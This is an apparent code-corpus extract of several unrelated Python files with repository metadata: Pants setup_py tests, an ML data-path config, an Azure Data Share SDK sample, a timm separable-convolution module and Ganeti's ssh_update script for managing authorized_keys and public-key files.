name='invalid_bin2', version='1.1.1'
).with_binaries(foo=':no_entrypoint')
)
"""
),
)
self.assert_error("src/python/invalid_binary:invalid_bin1", InvalidEntryPoint)
self.assert_error("src/python/invalid_binary:invalid_bin2", InvalidEntryPoint)
class TestGetSources(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_sources,
get_ancestor_init_py,
RootRule(SetupPySourcesRequest),
RootRule(SourceRootConfig),
*determine_source_files_rules(),
*strip_source_roots_rules(),
]
def assert_sources(
self,
expected_files,
expected_packages,
expected_namespace_packages,
expected_package_data,
addrs,
):
srcs = self.request_single_product(
SetupPySources,
Params(
SetupPySourcesRequest(Targets([self.tgt(addr) for addr in addrs]), py2=False),
SourceRootConfig.global_instance(),
),
)
chroot_snapshot = self.request_single_product(Snapshot, Params(srcs.digest))
assert sorted(expected_files) == sorted(chroot_snapshot.files)
assert sorted(expected_packages) == sorted(srcs.packages)
assert sorted(expected_namespace_packages) == sorted(srcs.namespace_packages)
assert expected_package_data == dict(srcs.package_data)
def test_get_sources(self) -> None:
init_source_root()
self.create_file(
"src/python/foo/bar/baz/BUILD",
textwrap.dedent(
"""
python_library(name='baz1', sources=['baz1.py'])
python_library(name='baz2', sources=['baz2.py'])
"""
),
)
self.create_file("src/python/foo/bar/baz/baz1.py", "")
self.create_file("src/python/foo/bar/baz/baz2.py", "")
self.create_file("src/python/foo/bar/__init__.py", _namespace_decl)
self.create_file("src/python/foo/qux/BUILD", "python_library()")
self.create_file("src/python/foo/qux/__init__.py", "")
self.create_file("src/python/foo/qux/qux.py", "")
self.create_file("src/python/foo/resources/BUILD", 'resources(sources=["js/code.js"])')
self.create_file("src/python/foo/resources/js/code.js", "")
self.create_file("src/python/foo/__init__.py", "")
self.assert_sources(
expected_files=["foo/bar/baz/baz1.py", "foo/bar/__init__.py", "foo/__init__.py"],
expected_packages=["foo", "foo.bar", "foo.bar.baz"],
expected_namespace_packages=["foo.bar"],
expected_package_data={},
addrs=["src/python/foo/bar/baz:baz1"],
)
self.assert_sources(
expected_files=["foo/bar/baz/baz2.py", "foo/bar/__init__.py", "foo/__init__.py"],
expected_packages=["foo", "foo.bar", "foo.bar.baz"],
expected_namespace_packages=["foo.bar"],
expected_package_data={},
addrs=["src/python/foo/bar/baz:baz2"],
)
self.assert_sources(
expected_files=["foo/qux/qux.py", "foo/qux/__init__.py", "foo/__init__.py"],
expected_packages=["foo", "foo.qux"],
expected_namespace_packages=[],
expected_package_data={},
addrs=["src/python/foo/qux"],
)
self.assert_sources(
expected_files=[
"foo/bar/baz/baz1.py",
"foo/bar/__init__.py",
"foo/qux/qux.py",
"foo/qux/__init__.py",
"foo/__init__.py",
"foo/resources/js/code.js",
],
expected_packages=["foo", "foo.bar", "foo.bar.baz", "foo.qux"],
expected_namespace_packages=["foo.bar"],
expected_package_data={"foo": ("resources/js/code.js",)},
addrs=["src/python/foo/bar/baz:baz1", "src/python/foo/qux", "src/python/foo/resources"],
)
self.assert_sources(
expected_files=[
"foo/bar/baz/baz1.py",
"foo/bar/baz/baz2.py",
"foo/bar/__init__.py",
"foo/qux/qux.py",
"foo/qux/__init__.py",
"foo/__init__.py",
"foo/resources/js/code.js",
],
expected_packages=["foo", "foo.bar", "foo.bar.baz", "foo.qux"],
expected_namespace_packages=["foo.bar"],
expected_package_data={"foo": ("resources/js/code.js",)},
addrs=[
"src/python/foo/bar/baz:baz1",
"src/python/foo/bar/baz:baz2",
"src/python/foo/qux",
"src/python/foo/resources",
],
)
class TestGetRequirements(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_requirements,
get_owned_dependencies,
get_exporting_owner,
RootRule(DependencyOwner),
]
def assert_requirements(self, expected_req_strs, addr):
reqs = self.request_single_product(
ExportedTargetRequirements,
Params(DependencyOwner(ExportedTarget(self.tgt(addr))), create_options_bootstrapper()),
)
assert sorted(expected_req_strs) == list(reqs)
def test_get_requirements(self) -> None:
self.create_file(
"3rdparty/BUILD",
textwrap.dedent(
"""
python_requirement_library(
name='ext1',
requirements=[python_requirement('ext1==1.22.333')],
)
python_requirement_library(
name='ext2',
requirements=[python_requirement('ext2==4.5.6')],
)
python_requirement_library(
name='ext3',
requirements=[python_requirement('ext3==0.0.1')],
)
"""
),
)
self.create_file(
"src/python/foo/bar/baz/BUILD",
"python_library(dependencies=['3rdparty:ext1'], sources=[])",
)
self.create_file(
"src/python/foo/bar/qux/BUILD",
"python_library(dependencies=['3rdparty:ext2', 'src/python/foo/bar/baz'], sources=[])",
)
self.create_file(
"src/python/foo/bar/BUILD",
textwrap.dedent(
"""
python_library(
sources=[],
dependencies=['src/python/foo/bar/baz', 'src/python/foo/bar/qux'],
provides=setup_py(name='bar', version='9.8.7'),
)
"""
),
)
self.create_file(
"src/python/foo/corge/BUILD",
textwrap.dedent(
"""
python_library(
sources=[],
dependencies=['3rdparty:ext3', 'src/python/foo/bar'],
provides=setup_py(name='corge', version='2.2.2'),
)
"""
),
)
self.assert_requirements(["ext1==1.22.333", "ext2==4.5.6"], "src/python/foo/bar")
self.assert_requirements(["ext3==0.0.1", "bar==9.8.7"], "src/python/foo/corge")
class TestGetAncestorInitPy(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_ancestor_init_py,
RootRule(Targets),
RootRule(SourceRootConfig),
*determine_source_files_rules(),
]
def assert_ancestor_init_py(
self, expected_init_pys: Iterable[str], addrs: Iterable[str]
) -> None:
ancestor_init_py_files = self.request_single_product(
AncestorInitPyFiles,
Params(
Targets([self.tgt(addr) for addr in addrs]), SourceRootConfig.global_instance(),
),
)
snapshots = [
self.request_single_product(Snapshot, Params(digest))
for digest in ancestor_init_py_files.digests
]
init_py_files_found = set([file for snapshot in snapshots for file in snapshot.files])
# NB: Doesn't include the root __init__.py or the missing src/python/foo/bar/__init__.py.
assert sorted(expected_init_pys) == sorted(init_py_files_found)
def test_get_ancestor_init_py(self) -> None:
init_source_root()
# NB: src/python/foo/bar/baz/qux/__init__.py is a target's source.
self.create_file("src/python/foo/bar/baz/qux/BUILD", "python_library()")
self.create_file("src/python/foo/bar/baz/qux/qux.py", "")
self.create_file("src/python/foo/bar/baz/qux/__init__.py", "")
self.create_file("src/python/foo/bar/baz/__init__.py", "")
# NB: No src/python/foo/bar/__init__.py.
# NB: src/python/foo/corge/__init__.py is not any target's source.
self.create_file("src/python/foo/corge/BUILD", 'python_library(sources=["corge.py"])')
self.create_file("src/python/foo/corge/corge.py", "")
self.create_file("src/python/foo/corge/__init__.py", "")
self.create_file("src/python/foo/__init__.py", "")
self.create_file("src/python/__init__.py", "")
self.create_file("src/python/foo/resources/BUILD", 'resources(sources=["style.css"])')
self.create_file("src/python/foo/resources/style.css", "")
# NB: A stray __init__.py in a resources-only dir.
self.create_file("src/python/foo/resources/__init__.py", "")
# NB: None of these should include the root src/python/__init__.py, the missing
# src/python/foo/bar/__init__.py, or the stray src/python/foo/resources/__init__.py.
self.assert_ancestor_init_py(
["foo/bar/baz/qux/__init__.py", "foo/bar/baz/__init__.py", "foo/__init__.py"],
["src/python/foo/bar/baz/qux"],
)
self.assert_ancestor_init_py([], ["src/python/foo/resources"])
self.assert_ancestor_init_py(
["foo/corge/__init__.py", "foo/__init__.py"],
["src/python/foo/corge", "src/python/foo/resources"],
)
self.assert_ancestor_init_py(
[
"foo/bar/baz/qux/__init__.py",
"foo/bar/baz/__init__.py",
"foo/corge/__init__.py",
"foo/__init__.py",
],
["src/python/foo/bar/baz/qux", "src/python/foo/corge"],
)
class TestGetOwnedDependencies(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_owned_dependencies,
get_exporting_owner,
RootRule(DependencyOwner),
]
def assert_owned(self, owned: Iterable[str], exported: str):
assert sorted(owned) == sorted(
od.target.address.reference()
for od in self.request_single_product(
OwnedDependencies,
Params(
DependencyOwner(ExportedTarget(self.tgt(exported))),
create_options_bootstrapper(),
),
)
)
def test_owned_dependencies(self) -> None:
self.create_file(
"src/python/foo/bar/baz/BUILD",
textwrap.dedent(
"""
python_library(name='baz1', sources=[])
python_library(name='baz2', sources=[])
"""
),
)
self.create_file(
"src/python/foo/bar/BUILD",
textwrap.dedent(
"""
python_library(
name='bar1',
sources=[],
dependencies=['src/python/foo/bar/baz:baz1'],
provides=setup_py(name='bar1', version='1.1.1'),
)
python_library(
name='bar2',
sources=[],
dependencies=[':bar-resources', 'src/python/foo/bar/baz:baz2'],
)
resources(name='bar-resources', sources=[])
"""
),
)
self.create_file(
"src/python/foo/BUILD",
textwrap.dedent(
"""
python_library(
name='foo',
sources=[],
dependencies=['src/python/foo/bar:bar1', 'src/python/foo/bar:bar2'],
provides=setup_py(name='foo', version='3.4.5'),
)
"""
),
)
self.assert_owned(
["src/python/foo/bar:bar1", "src/python/foo/bar/baz:baz1"], "src/python/foo/bar:bar1"
)
self.assert_owned(
[
"src/python/foo",
"src/python/foo/bar:bar2",
"src/python/foo/bar:bar-resources",
"src/python/foo/bar/baz:baz2",
],
"src/python/foo",
)
class TestGetExportingOwner(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_exporting_owner,
RootRule(OwnedDependency),
]
def assert_is_owner(self, owner: str, owned: str):
assert (
owner
== self.request_single_product(
ExportedTarget,
Params(OwnedDependency(self.tgt(owned)), create_options_bootstrapper()),
).target.address.reference()
)
def assert_error(self, owned: str, exc_cls: Type[Exception]):
with pytest.raises(ExecutionError) as excinfo:
self.request_single_product(
ExportedTarget,
Params(OwnedDependency(self.tgt(owned)), create_options_bootstrapper()),
)
ex = excinfo.value
assert len(ex.wrapped_exceptions) == 1
assert type(ex.wrapped_exceptions[0]) == exc_cls
def assert_no_owner(self, owned: str):
self.assert_error(owned, NoOwnerError)
def assert_ambiguous_owner(self, owned: str):
self.assert_error(owned, AmbiguousOwnerError)
def test_get_owner_simple(self) -> None:
self.create_file(
"src/python/foo/bar/baz/BUILD",
textwrap.dedent(
"""
python_library(name='baz1', sources=[])
python_library(name='baz2', sources=[])
"""
),
)
self.create_file(
"src/python/foo/bar/BUILD",
textwrap.dedent(
"""
python_library(
name='bar1',
sources=[],
dependencies=['src/python/foo/bar/baz:baz1'],
provides=setup_py(name='bar1', version='1.1.1'),
)
python_library(
name='bar2',
sources=[],
dependencies=[':bar-resources', 'src/python/foo/bar/baz:baz2'],
)
resources(name='bar-resources', sources=[])
"""
),
)
self.create_file(
"src/python/foo/BUILD",
textwrap.dedent(
"""
python_library(
name='foo1',
sources=[],
dependencies=['src/python/foo/bar/baz:baz2'],
provides=setup_py(name='foo1', version='0.1.2'),
)
python_library(name='foo2', sources=[])
python_library(
name='foo3',
sources=[],
dependencies=['src/python/foo/bar:bar2'],
provides=setup_py(name='foo3', version='3.4.5'),
)
"""
),
)
self.assert_is_owner("src/python/foo/bar:bar1", "src/python/foo/bar:bar1")
self.assert_is_owner("src/python/foo/bar:bar1", "src/python/foo/bar/baz:baz1")
self.assert_is_owner("src/python/foo:foo1", "src/python/foo:foo1")
self.assert_is_owner("src/python/foo:foo3", "src/python/foo:foo3")
self.assert_is_owner("src/python/foo:foo3", "src/python/foo/bar:bar2")
self.assert_is_owner("src/python/foo:foo3", "src/python/foo/bar:bar-resources")
self.assert_no_owner("src/python/foo:foo2")
self.assert_ambiguous_owner("src/python/foo/bar/baz:baz2")
def test_get_owner_siblings(self) -> None:
self.create_file(
"src/python/siblings/BUILD",
textwrap.dedent(
"""
python_library(name='sibling1', sources=[])
python_library(
name='sibling2',
sources=[],
dependencies=['src/python/siblings:sibling1'],
provides=setup_py(name='siblings', version='2.2.2'),
)
"""
),
)
self.assert_is_owner("src/python/siblings:sibling2", "src/python/siblings:sibling1")
self.assert_is_owner("src/python/siblings:sibling2", "src/python/siblings:sibling2")
def test_get_owner_not_an_ancestor(self) -> None:
self.create_file(
"src/python/notanancestor/aaa/BUILD",
textwrap.dedent(
"""
python_library(name='aaa', sources=[])
"""
),
)
self.create_file(
"src/python/notanancestor/bbb/BUILD",
textwrap.dedent(
"""
python_library(
name='bbb',
sources=[],
dependencies=['src/python/notanancestor/aaa'],
provides=setup_py(name='bbb', version='11.22.33'),
)
"""
),
)
self.assert_no_owner("src/python/notanancestor/aaa")
self.assert_is_owner("src/python/notanancestor/bbb", "src/python/notanancestor/bbb")
def test_get_owner_multiple_ancestor_generations(self) -> None:
self.create_file(
"src/python/aaa/bbb/ccc/BUILD",
textwrap.dedent(
"""
python_library(name='ccc', sources=[])
"""
),
)
self.create_file(
"src/python/aaa/bbb/BUILD",
textwrap.dedent(
"""
python_library(
name='bbb',
sources=[],
dependencies=['src/python/aaa/bbb/ccc'],
provides=setup_py(name='bbb', version='1.1.1'),
)
"""
),
)
self.create_file(
"src/python/aaa/BUILD",
textwrap.dedent(
"""
python_library(
name='aaa',
sources=[],
dependencies=['src/python/aaa/bbb/ccc'],
provides=setup_py(name='aaa', version='2.2.2'),
)
"""
),
)
self.assert_is_owner("src/python/aaa/bbb", "src/python/aaa/bbb/ccc")
self.assert_is_owner("src/python/aaa/bbb", "src/python/aaa/bbb")
self.assert_is_owner("src/python/aaa", "src/python/aaa")
def test_validate_args() -> None:
with pytest.raises(InvalidSetupPyArgs):
validate_args(("bdist_wheel", "upload"))
with pytest.raises(InvalidSetupPyArgs):
validate_args(("sdist", "-d", "new_distdir/"))
with pytest.raises(InvalidSetupPyArgs):
validate_args(("--dist-dir", "new_distdir/", "sdist"))
validate_args(("sdist",))
validate_args(("bdist_wheel", "--foo"))
|
[
"noreply@github.com"
] |
noreply@github.com
|
48d78e65acb643608b7d9a129ff13c6c9954b465
|
c15a50057951317728f4eaa1854904b53161c19e
|
/FM_FTRL/ftrl_utils/params.py
|
1b77ef869aa96fceab4d0c0f42338693acfd1c7b
|
[] |
no_license
|
marvinxu-free/talking_data
|
8ca3ecab5ed5585fd0db46cebd27148e71495d2a
|
1549fe13dc9489255c3c87dd6c13a65a1176ea07
|
refs/heads/master
| 2020-03-16T05:41:15.437712
| 2018-05-10T02:56:27
| 2018-05-10T02:56:27
| 132,538,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 666
|
py
|
# -*- coding: utf-8 -*-
# Project: ml_more_algorithm
# Author: chaoxu create this file
# Time: 2018/4/16
# Company : Maxent
# Email: chao.xu@maxent-inc.com
import os
module_path = os.path.split(os.path.realpath(__file__))[0]
Data_path = os.path.realpath("{0}/../../input".format(module_path))
train_file = '{0}/train_new_subsample.csv'.format(Data_path)
train_file_tmp = '{0}/train_subsample_tmp.csv'.format(Data_path)
test_file = '{0}/test.csv'.format(Data_path)
test_file_tmp = '{0}/test_tmp.csv'.format(Data_path)
predict_report_file = '{0}/predict.csv'.format(Data_path)
best_weights_file = '{0}/best.hdf5'.format(Data_path)
batchsize = 10000000
D = 2 ** 20
|
[
"chao.xu@maxent-inc.com"
] |
chao.xu@maxent-inc.com
|
3144ecf342e1c38eb5c4bcf21135c183e9157eee
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/datashare/azure-mgmt-datashare/generated_samples/provider_share_subscriptions_adjust.py
|
496c049f7baa29e25e02b0ee6f7ed8ffa89deaa0
|
[
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012
| 2023-09-06T01:08:06
| 2023-09-06T01:08:06
| 4,127,088
| 4,046
| 2,755
|
MIT
| 2023-09-14T21:48:49
| 2012-04-24T16:46:12
|
Python
|
UTF-8
|
Python
| false
| false
| 1,824
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.datashare import DataShareManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-datashare
# USAGE
python provider_share_subscriptions_adjust.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = DataShareManagementClient(
credential=DefaultAzureCredential(),
subscription_id="12345678-1234-1234-12345678abc",
)
response = client.provider_share_subscriptions.adjust(
resource_group_name="SampleResourceGroup",
account_name="Account1",
share_name="Share1",
provider_share_subscription_id="4256e2cf-0f82-4865-961b-12f83333f487",
provider_share_subscription={"properties": {"expirationDate": "2020-12-26T22:33:24.5785265Z"}},
)
print(response)
# x-ms-original-file: specification/datashare/resource-manager/Microsoft.DataShare/stable/2020-09-01/examples/ProviderShareSubscriptions_Adjust.json
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
13319f9028ad09f1d990efba329a3d5162550bb6
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/dev/cv/image_classification/CSPResNeXt-50_ID1888_for_PyTorch/timm/models/layers/separable_conv.py
|
340f58362031b648a0361ac28d85bde369834876
|
[
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later",
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"MIT",
"CC-BY-NC-4.0",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 4,530
|
py
|
#
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
""" Depthwise Separable Conv Modules
Basic DWS convs. Other variations of DWS exist with batch norm or activations between the
DW and PW convs such as the Depthwise modules in MobileNetV2 / EfficientNet and Xception.
Hacked together by / Copyright 2020 Ross Wightman
"""
from torch import nn as nn
from .create_conv2d import create_conv2d
from .create_norm_act import convert_norm_act
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
class SeparableConvBnAct(nn.Module):
""" Separable Conv w/ trailing Norm and Activation
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU,
apply_act=True, drop_block=None):
super(SeparableConvBnAct, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
norm_act_layer = convert_norm_act(norm_layer, act_layer)
self.bn = norm_act_layer(out_channels, apply_act=apply_act, drop_block=drop_block)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
if self.bn is not None:
x = self.bn(x)
return x
class SeparableConv2d(nn.Module):
""" Separable Conv
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1):
super(SeparableConv2d, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
return x
|
[
"wangjiangben@huawei.com"
] |
wangjiangben@huawei.com
|
cd6ab3e5c6e2b23fd99f849a3780802dacbeb28a
|
e9c119c3da03b4347456091cc439aaedb07a4bdf
|
/python work week 9 question 2.py
|
576f46d5c72e8ca358a6752ef261406819195dd4
|
[] |
no_license
|
infinityman8/week9-12-logbook
|
da8b1e5942f36b006f3e6bfc0b713623d862f247
|
4de033f3fcb0b69984a1ba0f4a0a654c386c4ec1
|
refs/heads/master
| 2020-04-07T13:52:27.005786
| 2018-12-04T17:44:12
| 2018-12-04T17:44:12
| 158,425,236
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 144
|
py
|
def main():
a=5
b=7
print(mystery(a,b))
def mystery(x,y):
z=x + y
z= z / 2.0
return z
main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
8b8c7653fa04c56d1f7f07d4dfa5f5737209c3b7
|
c9a34a7036865101d05065fe47e86c8b173d0b93
|
/test.py
|
fbe90e2d911fe9a2612c4329bca87b6036e73644
|
[] |
no_license
|
Pablocg0/Proyecto_ia
|
7f4e810a5b3cffe586609527d4f2c1367c0ee096
|
5f8ffa56f5e4c7b8adbe098b81599fa7fddbb7ae
|
refs/heads/master
| 2020-09-06T18:10:44.894310
| 2019-11-09T05:54:18
| 2019-11-09T05:54:18
| 220,504,872
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
import pandas as pd
diccionario = pd.read_csv("dick_1.csv")
palabra = diccionario["a"].sample(n=10)
palabra.to_csv("dick.csv",encoding='utf-8',index=False)
|
[
"pablocg064@gmail.com"
] |
pablocg064@gmail.com
|
288a244c7b7b0c75beeca7844880dcf05b568272
|
ab41cbae15cbbaac52ec7db5da568b337d232bf6
|
/lib/tools/ssh_update.py
|
f9d1b6db3f56e7fcd50aa5b66a06fbe27614fb08
|
[
"BSD-2-Clause"
] |
permissive
|
skycover/ganeti-2.15.2
|
9d6eef72cd1c7942c7b293c4bcc4c0b62f880e9f
|
db69c3917c1ae00f31943c52c147c7938ce64d9c
|
refs/heads/master
| 2021-01-24T13:24:02.294516
| 2018-02-27T18:52:36
| 2018-02-27T18:52:36
| 123,173,553
| 0
| 0
| null | 2018-02-27T18:53:46
| 2018-02-27T18:53:46
| null |
UTF-8
|
Python
| false
| false
| 7,218
|
py
|
#
#
# Copyright (C) 2014 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script to update a node's SSH key files.
This script is used to update the node's 'authorized_keys' and
'ganeti_pub_key' files. It will be called via SSH from the master
node.
"""
import os
import os.path
import optparse
import sys
import logging
from ganeti import cli
from ganeti import constants
from ganeti import errors
from ganeti import utils
from ganeti import ht
from ganeti import ssh
from ganeti import pathutils
from ganeti.tools import common
_DATA_CHECK = ht.TStrictDict(False, True, {
constants.SSHS_CLUSTER_NAME: ht.TNonEmptyString,
constants.SSHS_NODE_DAEMON_CERTIFICATE: ht.TNonEmptyString,
constants.SSHS_SSH_PUBLIC_KEYS:
ht.TItems(
[ht.TElemOf(constants.SSHS_ACTIONS),
ht.TDictOf(ht.TNonEmptyString, ht.TListOf(ht.TNonEmptyString))]),
constants.SSHS_SSH_AUTHORIZED_KEYS:
ht.TItems(
[ht.TElemOf(constants.SSHS_ACTIONS),
ht.TDictOf(ht.TNonEmptyString, ht.TListOf(ht.TNonEmptyString))]),
constants.SSHS_GENERATE: ht.TDictOf(ht.TNonEmptyString, ht.TString),
})
class SshUpdateError(errors.GenericError):
"""Local class for reporting errors.
"""
def ParseOptions():
"""Parses the options passed to the program.
@return: Options and arguments
"""
program = os.path.basename(sys.argv[0])
parser = optparse.OptionParser(
usage="%prog [--dry-run] [--verbose] [--debug]", prog=program)
parser.add_option(cli.DEBUG_OPT)
parser.add_option(cli.VERBOSE_OPT)
parser.add_option(cli.DRY_RUN_OPT)
(opts, args) = parser.parse_args()
return common.VerifyOptions(parser, opts, args)
def UpdateAuthorizedKeys(data, dry_run, _homedir_fn=None):
"""Updates root's C{authorized_keys} file.
@type data: dict
@param data: Input data
@type dry_run: boolean
@param dry_run: Whether to perform a dry run
"""
instructions = data.get(constants.SSHS_SSH_AUTHORIZED_KEYS)
if not instructions:
logging.info("No change to the authorized_keys file requested.")
return
(action, authorized_keys) = instructions
(auth_keys_file, _) = \
ssh.GetAllUserFiles(constants.SSH_LOGIN_USER, mkdir=True,
_homedir_fn=_homedir_fn)
key_values = []
for key_value in authorized_keys.values():
key_values += key_value
if action == constants.SSHS_ADD:
if dry_run:
logging.info("This is a dry run, not adding keys to %s",
auth_keys_file)
else:
if not os.path.exists(auth_keys_file):
utils.WriteFile(auth_keys_file, mode=0600, data="")
ssh.AddAuthorizedKeys(auth_keys_file, key_values)
elif action == constants.SSHS_REMOVE:
if dry_run:
logging.info("This is a dry run, not removing keys from %s",
auth_keys_file)
else:
ssh.RemoveAuthorizedKeys(auth_keys_file, key_values)
else:
raise SshUpdateError("Action '%s' not implemented for authorized keys."
% action)
def UpdatePubKeyFile(data, dry_run, key_file=pathutils.SSH_PUB_KEYS):
"""Updates the file of public SSH keys.
@type data: dict
@param data: Input data
@type dry_run: boolean
@param dry_run: Whether to perform a dry run
"""
instructions = data.get(constants.SSHS_SSH_PUBLIC_KEYS)
if not instructions:
logging.info("No instructions to modify public keys received."
" Not modifying the public key file at all.")
return
(action, public_keys) = instructions
if action == constants.SSHS_OVERRIDE:
if dry_run:
logging.info("This is a dry run, not overriding %s", key_file)
else:
ssh.OverridePubKeyFile(public_keys, key_file=key_file)
elif action in [constants.SSHS_ADD, constants.SSHS_REPLACE_OR_ADD]:
if dry_run:
logging.info("This is a dry run, not adding or replacing a key to %s",
key_file)
else:
for uuid, keys in public_keys.items():
if action == constants.SSHS_REPLACE_OR_ADD:
ssh.RemovePublicKey(uuid, key_file=key_file)
for key in keys:
ssh.AddPublicKey(uuid, key, key_file=key_file)
elif action == constants.SSHS_REMOVE:
if dry_run:
logging.info("This is a dry run, not removing keys from %s", key_file)
else:
for uuid in public_keys.keys():
ssh.RemovePublicKey(uuid, key_file=key_file)
elif action == constants.SSHS_CLEAR:
if dry_run:
logging.info("This is a dry run, not clearing file %s", key_file)
else:
ssh.ClearPubKeyFile(key_file=key_file)
else:
raise SshUpdateError("Action '%s' not implemented for public keys."
% action)
